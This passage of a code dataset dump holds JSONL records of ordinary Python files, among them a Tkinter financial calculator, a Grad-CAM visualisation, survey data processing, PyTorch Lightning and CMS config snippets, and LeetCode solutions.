340:\n height += seight\n width = 0\n\n draw.text((width, height), word, font=self.f)\n width += sidth + size[0]\n\n if width > midth:\n midth = width\n\n height += seight\n width = 0\n\n y = rsize[1] // 2 - height // 2\n x = 300 + (rsize[0] - 370 - midth) // 2\n res.alpha_composite(tex, (x, y))\n\n if height < 210:\n height = 210\n y = rsize[1] // 2 - height // 2\n\n res.alpha_composite(self.q, (250, y + 10))\n res.alpha_composite(self.qf, (rsize[0] - 75, y + int(height - seight * 2 + 10)))\n\n draw = ImageDraw.Draw(res)\n draw.multiline_text((25, 310), f\"© {name} {last_name}{' - ' + otext if otext else ''}\\n\"\n f\"@ {datetime.date.today()}\", font=self.fs)\n\n f = io.BytesIO()\n res.save(f, format='png')\n f.seek(0)\n attachment = await upload_photo(self.api, f, msg.user_id)\n f.close()\n\n return await msg.answer('', attachment=str(attachment))\n","sub_path":"plugins/content/quote/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"521957984","text":"import json\nimport itertools\n\nTHRESHOLD = 240.9\n\n\ndef get_all_labels(num_questions):\n \"\"\"\n :param num_questions: (int) the number of questions\n :return: [str], a lists list to the low and high question\n columns name prefixes in order\n \"\"\"\n high_question_labels = ['high_q{}'.format(num) for\n num in range(num_questions // 2)]\n low_question_labels = ['low_q{}'.format(num) for\n num in range(num_questions // 2)]\n return low_question_labels + high_question_labels\n\n\ndef get_judgment_labels(num_judgments):\n \"\"\"\n :param num_judgments: (int) the number of num_judgments\n :return: [str], a list of all the judgment suffixes in columns names\n \"\"\"\n return ['j{}'.format(num) for num in range(num_judgments)]\n\n\ndef get_col_labels(num_questions, num_judgments):\n \"\"\"\n :param num_questions: (int) the number of questions\n :param num_judgments: (int) the number of responses\n :return: (gen) a generator yielding strings for column names\n \"\"\"\n yield 'consent'\n for q_num in range(num_questions // 2):\n yield from ['low_q{}_score'.format(q_num),\n 'low_q{}_index'.format(q_num),\n 'low_q{}_choice'.format(q_num)]\n for j_num in range(num_judgments):\n yield 'low_q{}_j{}'.format(q_num, j_num)\n for q_num in range(num_questions // 2):\n yield from ['high_q{}_score'.format(q_num),\n 'high_q{}_index'.format(q_num),\n 'high_q{}_choice'.format(q_num)]\n for j_num in range(num_judgments):\n yield 'high_q{}_j{}'.format(q_num, j_num)\n\n\ndef fill_experiment_three_data(data, master_responses):\n \"\"\"\n :param data: (dict) a structured dictionary with lists as values which will\n be updated\n :param master_responses: [dict] list of responses to the survey\n :return: (None) the dictionary data is mutated\n \"\"\"\n for person in master_responses:\n # Grab person and first response\n responses = person['data']\n first_response = responses[0]\n\n # Gather experimental set-up information\n judgment_indices = first_response['judgmentIndicies']\n question_indices = first_response['questionIndicies']\n question_scores = first_response['questionScores']\n question_labels = _get_question_labels(question_scores)\n\n # Update score and index information\n for label, score, index in zip(question_labels, question_scores,\n question_indices):\n data['{}_score'.format(label)].append(score)\n data['{}_index'.format(label)].append(index)\n\n # Update consent information\n consent_answer = json.loads(first_response['responses'])\n consent_value = 1 if consent_answer['Q0'].startswith(\n 'I consent') else 0\n data['consent'].append(consent_value)\n\n # Update judgment responses\n headers = ('{}_j{}'.format(q_label, j_label) for q_label, j_label in\n itertools.product(question_labels, judgment_indices))\n for likert_index in range(2, 12):\n likert_data = responses[likert_index]\n likert_responses = json.loads(likert_data['responses'])\n for sorted_label in sorted(likert_responses):\n data[next(headers)].append(int(likert_responses[sorted_label]))\n\n # Update choices\n choice_data = responses[13]\n choice_responses = json.loads(choice_data['responses'])\n for q_label, key in zip(question_labels, sorted(choice_responses)):\n choice_option = choice_responses[key]\n choice_value = 1 if choice_option == 'Reveal Answer' else 0\n data['{}_choice'.format(q_label)].append(choice_value)\n\n\ndef _get_question_labels(question_scores):\n \"\"\"\n :param question_scores: [int] the ordered list of scores corresponding to\n the up-votes of questions\n :return: [str] the labels of each of the questions for the DataFrame in\n order\n \"\"\"\n num_questions = len(question_scores)\n low_nums = iter(range(num_questions // 2))\n high_nums = iter(range(num_questions // 2))\n question_labels = []\n for score in question_scores:\n if score < THRESHOLD:\n question_labels.append('low_q{}'.format(next(low_nums)))\n else:\n question_labels.append('high_q{}'.format(next(high_nums)))\n return question_labels\n","sub_path":"analysis/05-cogsci-paper/utilities/processing_two.py","file_name":"processing_two.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"549539787","text":"#\n# Collective Knowledge (os)\n#\n# See CK LICENSE.txt for licensing details\n# See CK COPYRIGHT.txt for copyright details\n#\n# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net\n#\n\ncfg={} # Will be updated by CK (meta description of this module)\nwork={} # Will be updated by CK (temporal data)\nck=None # Will be updated by CK (initialized CK kernel) \n\n# Local settings\n\n##############################################################################\n# Initialize module\n\ndef init(i):\n \"\"\"\n\n Input: {}\n\n Output: {\n return - return code = 0, if successful\n > 0, if error\n (error) - error text if return > 0\n }\n\n \"\"\"\n return {'return':0}\n\n##############################################################################\n# find close OS\n\ndef find_close(i):\n \"\"\"\n Input: {\n (os_uoa) - load info from a given OS\n (os_dict) - if non-empty, return this dict\n }\n\n Output: {\n return - return code = 0\n\n platform - 'win' or 'linux'. Careful - it is always for current host OS! \n Use 'ck_name' key from meta for the target OS!\n\n bits - (str) 32 or 64. Careful - it is always for current host OS!\n Use 'bits' key from meta for the target OS!\n\n os_uoa - UOA of the most close OS\n os_uid - UID of the most close OS\n os_dict - meta of the most close OS\n\n (add_path) - list of extra path ...\n }\n \"\"\"\n\n r=ck.get_os_ck({})\n if r['return']>0: return r\n\n bits=r['bits']\n plat=r['platform']\n\n xos=i.get('os_uoa','')\n fc=i.get('find_close','')\n\n if xos=='':\n # Detect host platform\n # Search the most close OS\n ii={'action':'search',\n 'module_uoa':work['self_module_uid'],\n 'search_dict':{'ck_name':plat,\n 'bits':bits,\n 'generic':'yes',\n 'priority':'yes'},\n 'internal':'yes'}\n\n # Adding extra tags to separate different Linux flavours such as Mac OS X:\n import sys\n pl=sys.platform\n\n if pl=='darwin':\n ii['tags']='macos'\n elif plat=='linux':\n ii['tags']='standard'\n\n rx=ck.access(ii)\n if rx['return']>0: return rx\n\n lst=rx['lst']\n if len(lst)==0:\n return {'return':0, 'error':'most close platform was not found in CK'}\n\n pl=lst[0]\n\n xos=pl.get('data_uoa','')\n\n rr={'return':0, 'platform':plat, 'bits':bits}\n\n # Load OS\n if xos!='':\n r=ck.access({'action':'load',\n 'module_uoa':'os', \n 'data_uoa':xos})\n if r['return']>0: return r\n\n os_uoa=r['data_uoa']\n os_uid=r['data_uid']\n\n dd=r['dict']\n\n if len(i.get('os_dict',{}))!=0: # Substitute from 'machine' description (useful for remote access)\n dd=i['os_dict']\n\n rr['os_uoa']=os_uoa\n rr['os_uid']=os_uid\n rr['os_dict']=dd\n\n # Check if need to add path\n x=dd.get('add_to_path_os_uoa','')\n if x!='':\n rx=ck.access({'action':'find',\n 'module_uoa':work['self_module_uid'],\n 'data_uoa':x})\n if rx['return']>0: return rx\n px=rx['path']\n\n rr['add_path']=[px]\n\n return rr\n","sub_path":"module/os/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"292045645","text":"\"\"\"\nRuns a model on a single node across multiple gpus.\n\"\"\"\nimport os\nfrom argparse import ArgumentParser\n\nfrom pl_examples.models.lightning_template import LightningTemplateModel\nfrom pytorch_lightning import Trainer, seed_everything\n\nseed_everything(234)\n\n\ndef main(args):\n \"\"\" Main training routine specific for this project. \"\"\"\n # ------------------------\n # 1 INIT LIGHTNING MODEL\n # ------------------------\n model = LightningTemplateModel(**vars(args))\n\n # ------------------------\n # 2 INIT TRAINER\n # ------------------------\n trainer = Trainer.from_argparse_args(args)\n\n # ------------------------\n # 3 START TRAINING\n # ------------------------\n trainer.fit(model)\n\n\ndef run_cli():\n # ------------------------\n # TRAINING ARGUMENTS\n # ------------------------\n # these are project-wide arguments\n root_dir = os.path.dirname(os.path.realpath(__file__))\n parent_parser = ArgumentParser(add_help=False)\n\n # each LightningModule defines arguments relevant to it\n parser = LightningTemplateModel.add_model_specific_args(parent_parser, root_dir)\n parser = Trainer.add_argparse_args(parser)\n parser.set_defaults(gpus=2)\n args = parser.parse_args()\n\n # ---------------------\n # RUN TRAINING\n # ---------------------\n main(args)\n\n\nif __name__ == '__main__':\n run_cli()\n","sub_path":"pl_examples/basic_examples/gpu_template.py","file_name":"gpu_template.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"455182910","text":"\"\"\"\r\nПрограмма для работы с финансовыми расчетами\r\nVersion 1.1\r\nCreate by: Vitalij Ivanovskij \r\nLast change: 16.11.2020\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\n\r\n\r\n# Settings\r\nWIDTH = 500\r\nHEIGHT = 250\r\nWIN_POS_X = 300\r\nWIN_POS_Y = 100\r\nTITLE = 'Financy calculate v1.1'\r\nRESIZABLE_X = False\r\nRESIZABLE_Y = False\r\nFONT = 'Monaco 13'\r\nNOTEBOOK_FONT = 'Monaco 10'\r\nCAPTION_FONT = 'Monaco 13 bold'\r\n\r\n\r\nclass GUI():\r\n \"\"\"Создает пользовательский интерфейс\"\"\"\r\n\r\n def __init__(self):\r\n self.root = self.create_main_GUI_window()\r\n self.tabs = self._create_GUI_tabs()\r\n self.applications = self._add_applications()\r\n self._bind_root_for_change_tabs()\r\n self.style = self.set_styles_for_GUI()\r\n self._application_init(0)\r\n\r\n def create_main_GUI_window(self):\r\n \"\"\"Инициализация пользовательского окна\"\"\"\r\n root = Tk()\r\n root.title(TITLE)\r\n root.geometry(f'{WIDTH}x{HEIGHT}+{WIN_POS_X}+{WIN_POS_Y}')\r\n root.resizable(RESIZABLE_X, RESIZABLE_Y)\r\n return root\r\n\r\n def set_styles_for_GUI(self):\r\n \"\"\"Инициализация стилей оформления виджетов\"\"\"\r\n style = ttk.Style()\r\n style.configure('.', font=FONT, padding=5)\r\n style.configure('TNotebook.Tab', font=NOTEBOOK_FONT, padding=3)\r\n return style\r\n\r\n def _create_GUI_tabs(self):\r\n \"\"\"Создает виджет, который будет содер��ать вкладки на графическом окне\"\"\"\r\n tabs = ttk.Notebook(self.root, style='TNotebook')\r\n tabs.pack(fill='both', expand='yes')\r\n return tabs\r\n\r\n def _add_applications(self):\r\n \"\"\"Инициализирует приложения\"\"\"\r\n self.income = Income(self)\r\n self.mid_percent = MidPersent(self)\r\n self.margin = Margin(self)\r\n return [self.income, self.mid_percent, self.margin]\r\n\r\n def _bind_root_for_change_tabs(self):\r\n \"\"\"\r\n Устанавливает горячие клавиши , для root,\r\n для переключения вкладок.\r\n \"\"\"\r\n self.root.bind('',\r\n lambda event: self._select_prev_tab())\r\n self.root.bind('',\r\n lambda event: self._select_next_tab())\r\n\r\n def _select_prev_tab(self):\r\n \"\"\"Переход на предыдущую вкладку\"\"\"\r\n next_index, prev_index = self._get_tabs_indexes()\r\n self.tabs.select(prev_index)\r\n self._application_init(prev_index)\r\n\r\n def _select_next_tab(self):\r\n \"\"\"Переход на следующую вкладку\"\"\"\r\n next_index, prev_index = self._get_tabs_indexes()\r\n self.tabs.select(next_index)\r\n self._application_init(next_index)\r\n\r\n def _application_init(self, index):\r\n \"\"\"\r\n При переключении вкладки устанавливает курсор\r\n в первое поле для ввода\r\n \"\"\"\r\n self.applications[index].entries[0].focus()\r\n\r\n def _get_tabs_indexes(self):\r\n \"\"\"\r\n Определяет индексы предыдущей и следующей вкладок\r\n \"\"\"\r\n cur_index = self.tabs.index('current')\r\n len_tabs = self.tabs.index('end')\r\n next_index = (cur_index + 1) % len_tabs\r\n prev_index = (cur_index - 1 + len_tabs) % len_tabs\r\n return (next_index, prev_index)\r\n\r\n def add_tab(self, frame, caption):\r\n \"\"\"Добавляет приложение в отдельные вкладки\"\"\"\r\n self.tabs.add(frame, text=caption)\r\n tab_index = len(self.tabs.tabs()) - 1\r\n return tab_index\r\n\r\n def show_GUI(self):\r\n self.root.mainloop()\r\n\r\n\r\nclass Application():\r\n \"\"\"Базовый класс для приложений\"\"\"\r\n\r\n def __init__(self, gui):\r\n self.gui = gui\r\n self.frame = ttk.Frame(gui.root)\r\n self.tab_index = self.gui.add_tab(self.frame, self.caption)\r\n\r\n def _add_label(self, text, row, column, sticky='e'):\r\n \"\"\"Добавление текстового поля в интерфейс\"\"\"\r\n label = ttk.Label(self.frame, text=text, width=16)\r\n label.grid(row=row, column=column, sticky=sticky)\r\n return label\r\n\r\n def _add_entry(self, row, column):\r\n \"\"\"Добавление поля ввода в интерфейс\"\"\"\r\n entry = ttk.Entry(self.frame, justify='center', font=FONT, width=10)\r\n entry.grid(row=row, column=column, sticky='n', padx=5)\r\n return entry\r\n\r\n def _prep_values(self, value):\r\n \"\"\"Приведение данных из полей ввода к float\"\"\"\r\n value = value.replace(',', '.')\r\n return float(value)\r\n\r\n def _show_error_message(self):\r\n \"\"\"Вывод сообщения об ошибке (если в поле ввода не число)\"\"\"\r\n messagebox.showinfo('Неверные данные', 'Введены неверные данные...')\r\n\r\n def _bind_entries(self, entries, function):\r\n \"\"\"\r\n Установка гарячих для клавиш полей entries\r\n - перемещение курсора на следующее поле \r\n и выполняет расчет результата\r\n / - перемещение курсора на поле вверх/вниз\r\n \"\"\"\r\n for entry in entries:\r\n # Определение индексов полей: текущего, предыдущего и следующего\r\n cur_index = entries.index(entry)\r\n next_index = (cur_index + 1) % len(entries)\r\n prev_index = (cur_index - 1 + len(entries)) % len(entries)\r\n # Определение следующего поля для перемещения курсора\r\n # (при нажатии , )\r\n next_entry = entries[next_index]\r\n # Определение предыдущего поля для перемещения курсора\r\n # (при нажатии )\r\n prev_entry = entries[prev_index]\r\n\r\n self._bind_entry('',\r\n entry, next_entry)\r\n self._bind_entry('',\r\n entry, prev_entry)\r\n self._bind_entry('',\r\n entry, next_entry, function)\r\n self._bind_entry('', # - Enter на доп. клав.\r\n entry, next_entry, function)\r\n\r\n def _bind_entry(self, event_name, entry, next_entry, function=False):\r\n \"\"\"\r\n Установка горячей клавиши для текущего поля\r\n event_name - тип события (,,')\r\n entry - текущее поле\r\n next_entry - поле в которое следует переместить курсор\r\n function - функция, которая кроме перемещения курсора\r\n будет выполняться при нажатии гарячей клавиши\r\n (Для клавиши ).\r\n Если не определена (False) - не выполняется ничего\r\n (для клавиш и ).\r\n \"\"\"\r\n entry.bind(event_name,\r\n lambda event,\r\n entry=entry,\r\n next_entry=next_entry,\r\n function=function:\r\n self._bind_apply(event, entry, next_entry, function))\r\n\r\n def _bind_apply(self, event, entry, next_entry, function):\r\n \"\"\"Установка логики для горячей клавиши\"\"\"\r\n if self._check_entry(event, entry):\r\n next_entry.focus()\r\n if function:\r\n function()\r\n\r\n def _check_entry(self, event, entry):\r\n \"\"\"Проверка поля на корректность данных\"\"\"\r\n value = entry.get()\r\n if not value:\r\n return True\r\n if value:\r\n try:\r\n # Если значение поля преобразовывается в float -\r\n # все в порядке\r\n value = self._prep_values(value)\r\n return True\r\n except:\r\n self._show_error_message()\r\n entry.delete(0, END)\r\n return False\r\n\r\n\r\nclass Margin(Application):\r\n \"\"\"Класс для расчета маржи\"\"\"\r\n\r\n def __init__(self, gui):\r\n self.caption = 'Маржа'\r\n super().__init__(gui)\r\n self._add_labels()\r\n self.entries = self._add_entries()\r\n self._bind_entries(self.entries, self.margin_calculate)\r\n\r\n def _add_labels(self):\r\n self._add_label('', row=0, column=0)\r\n self._add_label('Себестоимость:', row=1, column=0)\r\n self._add_label('Цена:', row=2, column=0)\r\n self._add_label('Маржа равна:', row=1, column=2)\r\n self._add_label('Продажи:', row=3, column=0)\r\n self._add_label('Доход:', row=3, column=2, sticky='n')\r\n self.result_label = self._add_label(\r\n '', row=2, column=2, sticky='n')\r\n self.result_sales_label = self._add_label(\r\n '', row=4, column=2, sticky='n')\r\n\r\n def _add_entries(self):\r\n self.cost_price_entry = self._add_entry(row=1, column=1)\r\n self.price_entry = self._add_entry(row=2, column=1)\r\n self.sales_entry = self._add_entry(row=3, column=1)\r\n return [self.cost_price_entry, self.price_entry, self.sales_entry]\r\n\r\n def margin_calculate(self):\r\n \"\"\"Расчет маржи\"\"\"\r\n cost_price = self.cost_price_entry.get()\r\n price = self.price_entry.get()\r\n sales = self.sales_entry.get()\r\n if cost_price and price:\r\n cost_price = self._prep_values(cost_price)\r\n price = self._prep_values(price)\r\n margin = (price - cost_price) / price * 100\r\n self.result_label['text'] = f'{margin:.1f}%'\r\n if sales:\r\n sales = self._prep_values(sales)\r\n income = sales * margin / 100\r\n self.result_sales_label['text'] = f'{income:.2f}'\r\n\r\n\r\nclass Income(Application):\r\n \"\"\"Класс для расчета роста капитала\"\"\"\r\n\r\n def __init__(self, gui):\r\n self.caption = 'Рост капитала'\r\n super().__init__(gui)\r\n self._add_labels()\r\n self.entries = self._add_entries()\r\n self._bind_entries(self.entries, self._income_calculate)\r\n\r\n def _add_labels(self):\r\n self._add_label('', row=0, column=0)\r\n self._add_label('Капитал:', row=1, column=0)\r\n self._add_label('Процент(год.):', row=2, column=0)\r\n self._add_label('Пополнение(мес.):', row=3, column=0)\r\n self._add_label('Кол-во лет:', row=4, column=0)\r\n self._add_label('Итоговый капитал:', row=1, column=3)\r\n self.result_label = self._add_label(\r\n '', row=2, column=3, sticky='n')\r\n\r\n def _add_entries(self):\r\n self.capital_entry = self._add_entry(row=1, column=1)\r\n self.percent_entry = self._add_entry(row=2, column=1)\r\n self.replenish_entry = self._add_entry(row=3, column=1)\r\n self.years_entry = self._add_entry(row=4, column=1)\r\n return (self.capital_entry,\r\n self.percent_entry,\r\n self.replenish_entry,\r\n self.years_entry)\r\n\r\n def _income_calculate(self):\r\n \"\"\"Расчет будущего капитала\"\"\"\r\n capital = self.capital_entry.get()\r\n percent = self.percent_entry.get()\r\n replenish = self.replenish_entry.get()\r\n years = self.years_entry.get()\r\n if capital and percent and years:\r\n capital = self._prep_values(capital)\r\n if replenish:\r\n replenish = self._prep_values(replenish)\r\n else:\r\n replenish = 0\r\n percent = self._prep_values(percent)\r\n # процент вычисляется как среднее геометрическое\r\n # за период 12 месяцев\r\n percent = ((1 + percent / 100) ** (1 / 12) - 1) * 100\r\n years = self._prep_values(years)\r\n monthes = int((years * 12) // 1)\r\n\r\n for i in range(0, monthes):\r\n capital += capital * percent / 100\r\n capital += replenish\r\n self.result_label['text'] = f'{capital:,.2f}'\r\n\r\n\r\nclass MidPersent(Application):\r\n \"\"\"\r\n Класс для расчета среднего процента в год.\r\n Пример:\r\n Получаем прибыль 40% за 4 года. Какая доходность в год?\r\n Делить 40% на 4 не верно. Нужно взять среднее геометрическое значение.\r\n Расчитывается как корень 4-й степени (4 года) из 1.40 (прирост 40%)\r\n Ответ: 8.78%\r\n\r\n \"\"\"\r\n\r\n def __init__(self, gui):\r\n self.caption = 'Средний процент'\r\n super().__init__(gui)\r\n self._add_labels()\r\n self.entries = self._add_entries()\r\n self._bind_entries(self.entries, self.mid_percent_calculate)\r\n\r\n def _add_labels(self):\r\n self._add_label('', row=0, column=0)\r\n self._add_label('Процент:', row=1, column=0)\r\n self._add_label('Кол-во лет:', row=2, column=0)\r\n self._add_label('Средний процент:', row=1, column=3)\r\n self.result_label = self._add_label(\r\n '', row=2, column=3, sticky='n')\r\n\r\n def _add_entries(self):\r\n self.percent_entry = self._add_entry(row=1, column=1)\r\n self.years_entry = self._add_entry(row=2, column=1)\r\n return [self.percent_entry, self.years_entry]\r\n\r\n def mid_percent_calculate(self):\r\n \"\"\"Расчет среднего процента\"\"\"\r\n percent = self.percent_entry.get()\r\n years = self.years_entry.get()\r\n if percent and years:\r\n percent = self._prep_values(percent)\r\n years = self._prep_values(years)\r\n mid_percent = ((1 + percent / 100) ** (1 / years) - 1) * 100\r\n self.result_label['text'] = f'{mid_percent:.2f}%'\r\n\r\n\r\ndef main():\r\n gui = GUI()\r\n gui.show_GUI()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"financy.py","file_name":"financy.py","file_ext":"py","file_size_in_byte":15054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"623559788","text":"\"\"\"\n78. 子集\n给定一组不含重复元素的整数数组 nums,返回该数组所有可能的子集(幂集)。\n\n说明:解集不能包含重复的子集。\n\n示例:\n\n输入: nums = [1,2,3]\n输出:\n[\n [3],\n [1],\n [2],\n [1,2,3],\n [1,3],\n [2,3],\n [1,2],\n []\n]\n\"\"\"\n\"\"\"\n库函数\nPython itertools模块combinations(iterable, r)方法可以创建一个迭代器,返回iterable中所有长度为r的子序列,返回的子序列中的项按输入iterable中的顺序排序。\nhttps://www.cnblogs.com/FENG4Y/p/9916060.html\n\"\"\"\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = []\n for i in range(len(nums)+1):\n for tmp in itertools.combinations(nums, i):\n res.append(tmp)\n return res\n\n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = []\n n = len(nums)\n \n def helper(i, tmp):\n res.append(tmp)\n for j in range(i, n):\n helper(j + 1,tmp + [nums[j]] )\n helper(0, [])\n return res \n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = [[]]\n for i in nums:\n res = res + [[i] + num for num in res]\n return res\n\n","sub_path":"medium/78-subsets.py","file_name":"78-subsets.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"297386242","text":"import FWCore.ParameterSet.Config as cms\nfrom RecoTauTag.RecoTau.PFRecoTauQualityCuts_cfi import PFTauQualityCuts\nfrom RecoTauTag.RecoTau.TauDiscriminatorTools import requireLeadTrack\nfrom RecoTauTag.RecoTau.PFRecoTauDiscriminationByIsolation_cfi import pfRecoTauDiscriminationByIsolation\n\npfRecoTauDiscriminationByECALIsolation = pfRecoTauDiscriminationByIsolation.clone(\n PFTauProducer = cms.InputTag('pfRecoTauProducer'), #tau collection to discriminate\n\n # Require leading pion ensures that:\n # 1) these is at least one track above threshold (0.5 GeV) in the signal cone\n # 2) a track in the signal cone has pT > 5 GeV\n Prediscriminants = requireLeadTrack,\n\n # Select which collections to use for isolation. You can select one or both\n ApplyDiscriminationByECALIsolation = cms.bool(True), # use PFGammas when isolating\n ApplyDiscriminationByTrackerIsolation = cms.bool(False), # use PFChargedHadr when isolating\n\n applyOccupancyCut = cms.bool(True), # apply a cut on number of isolation objects\n maximumOccupancy = cms.uint32(0), # no gammas w/ pt > 1.5 GeV allowed\n\n applySumPtCut = cms.bool(False), # apply a cut on the sum Pt of the isolation objects\n maximumSumPtCut = cms.double(6.0),\n\n applyRelativeSumPtCut = cms.bool(False), # apply a cut on IsoPt/TotalPt\n relativeSumPtCut = cms.double(0.0),\n\n qualityCuts = PFTauQualityCuts,# set the standard quality cuts\n)\n\n\n","sub_path":"RecoTauTag/RecoTau/python/PFRecoTauDiscriminationByECALIsolation_cfi.py","file_name":"PFRecoTauDiscriminationByECALIsolation_cfi.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"518026159","text":"import pandas as pd\nimport numpy as np\n\nclass SlidingWindow:\n\n df = None\n window_size = 0\n\n def create_sld_df_single_exp(self, orig_df, window_size, analytic_functions_list):\n dfs_to_concate = []\n base_df = orig_df.drop('action', axis=1)\n for func in analytic_functions_list:\n method_to_call = getattr(base_df.rolling(window=window_size), func)\n analytic_df = method_to_call()\n analytic_df = analytic_df[window_size:]\n analytic_df.columns = [col + \"_sld_\" + func for col in analytic_df.columns]\n dfs_to_concate.append(analytic_df)\n\n action_df = orig_df[['action']][window_size:] # [[]] syntax to return DataFrame and not Series\n dfs_to_concate.append(action_df)\n return pd.concat(dfs_to_concate,axis=1)\n\n def create_sliding_df(self, orig_df, window_size, analytic_functions_list, expirements, participants):\n dfs_to_concate = []\n cols_to_drop = ['partc', 'action_file_index']\n for e in expirements:\n for p in participants:\n exp_df = orig_df[(orig_df['partc'] == p) & (orig_df['action_file_index'] == e)]\n exp_df = exp_df.drop(cols_to_drop, axis=1)\n exp_roll_df = self.create_sld_df_single_exp(exp_df, window_size, analytic_functions_list)\n\n dfs_to_concate.append(exp_roll_df)\n return pd.concat(dfs_to_concate, axis=0, ignore_index=True)\n\n def __init__(self, orig_df, window_size, num_experiments, num_participants, exclude, fnlist):\n exps = [i for i in range(1,num_experiments + 1) if i != exclude]\n parts = [i for i in range(1,num_participants + 1)]\n smp_df = self.create_sliding_df(orig_df, window_size, fnlist, exps, parts)\n self.window_size = window_size\n self.df = smp_df\n","sub_path":"notebooks/archive/sliding_window.py","file_name":"sliding_window.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"533339129","text":"# continue statement:\n\nfor n in range(1, 10):\n if n >= 5 and n <= 7:\n continue\n print(n)\nprint(\"========\")\n\nfruits = [\"apple\", \"banana\", \"cherry\"]\nfor f in fruits:\n if f == \"banana\":\n continue\n print(f)\nprint(\"========\")\n\nstr = 'Oz34gur17luk'\ntotal = 0\t# The sum of the digits seen so far.\ncount = 0\t# The number of digits seen so far.\nfor i in range(len(str)):\n if str[i].isalpha():\n continue\n total = total + int(str[i])\n count = count + 1\nprint(\"Number of digits =\", count)\nprint(\"Sum of digits =\", total)\n","sub_path":"scripts/p391_continue.py","file_name":"p391_continue.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161549241","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 18 00:27:25 2021\n\n@author: saina\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport cv2\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n\nclass ModelGradCam(nn.Module):\n \n def __init__(self,model):\n super().__init__()\n \n # get the pretrained resnet network\n self.res = model\n \n # disect the network to access its last convolutional layer\n self.features_conv = nn.Sequential(*list(self.res.children())[:-2])\n \n # # get the max pool of the features stem\n # self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)\n \n # get the classifier of the resnet\n self.classifier1 = list(self.res.children())[-2:][0]\n self.classifier2 = list(self.res.children())[-2:][1]\n\n \n # placeholder for the gradients\n self.gradients = None\n \n # hook for the gradients of the activations\n def activations_hook(self, grad):\n self.gradients = grad\n \n def forward(self, x):\n x = self.features_conv(x)\n \n # register the hook\n h = x.register_hook(self.activations_hook)\n\n # apply the remaining pooling\n x = self.classifier1(x)\n x = F.avg_pool2d(x, 4)\n x = x.view(x.size(0), -1)\n x = self.classifier2(x)\n return x\n \n # method for the gradient extraction\n def get_activations_gradient(self):\n return self.gradients\n \n # method for the activation exctraction\n def get_activations(self, x):\n return self.features_conv(x)\n \n \n\n\ndef gradcam_out(model,img_d,device):\n \n ref = {0: 'airplane',1: 'automobile',2: 'bird',3: 'cat',\n 4: 'deer',5: 'dog',6: 'frog',7: 'horse',\n 8: 'ship',9: 'truck'}\n \n img = img_d['image']\n label = img_d['label'].item()\n predicted = img_d['prediction'].item()\n \n # img = img.to(device)\n \n # initialize the resnet model\n res = ModelGradCam(model)\n \n # set the evaluation mode\n res.eval()\n \n x = img.view(1,3,32,32)\n \n # get the most likely prediction of the model\n pred = res(x)\n \n # get the gradient of the output with respect to the parameters of the model\n pred[:,label].backward()\n \n # pull the gradients out of the model\n gradients = res.get_activations_gradient()\n \n # pool the gradients across the channels\n pooled_gradients = torch.mean(gradients, dim=[0, 2, 3])\n \n # get the activations of the last convolutional layer\n activations = res.get_activations(x).detach()\n \n # weight the channels by corresponding gradients\n \n for i in range(256):\n activations[:, i, :, :] *= pooled_gradients[i]\n \n \n # weight the channels by corresponding gradients\n \n heatmap = torch.mean(activations, dim=1).squeeze()\n # heatmap.shape\n \n # relu on top of the heatmap\n # expression (2) in https://arxiv.org/pdf/1610.02391.pdf\n heatmap = np.maximum(heatmap.cpu(), 0)\n # heatmap.shape\n \n heatmap /= torch.max(heatmap)\n \n img = img_d['image']\n img_arr = np.transpose(img.cpu().data.numpy() , (1,2,0))\n img_arr = ((img_arr - img_arr.min()) * (1/(img_arr.max() - img_arr.min()) * 255)).astype('uint8')\n \n heatmap_numpy_resized = cv2.resize(heatmap.cpu().data.numpy(), (img_arr.shape[0], img_arr.shape[1]))\n heatmap_rescaled = np.uint8(255 * heatmap_numpy_resized)\n\n # plt.imshow(heatmap_rescaled)\n heatmap_final = cv2.applyColorMap(heatmap_rescaled, cv2.COLORMAP_JET)\n superimposed_img = heatmap_final * 0.4 + img_arr\n cv2.imwrite('C:\\\\Users\\\\saina\\\\Documents\\\\EVA\\\\S10\\\\Incorrect_GC\\\\' +ref[label] + '_' + ref[predicted]+ '.jpg', superimposed_img)\n print('Image Written')\n \n return superimposed_img, ref[label], ref[predicted]","sub_path":"S11/gradcam.py","file_name":"gradcam.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"214331409","text":"########## Used as a connection between main, parameters, queue, and location\n\nimport numpy\nfrom bluesky.plans import grid_scan\nfrom ophyd.sim import det4, motor1, motor2, noisy_det\nimport 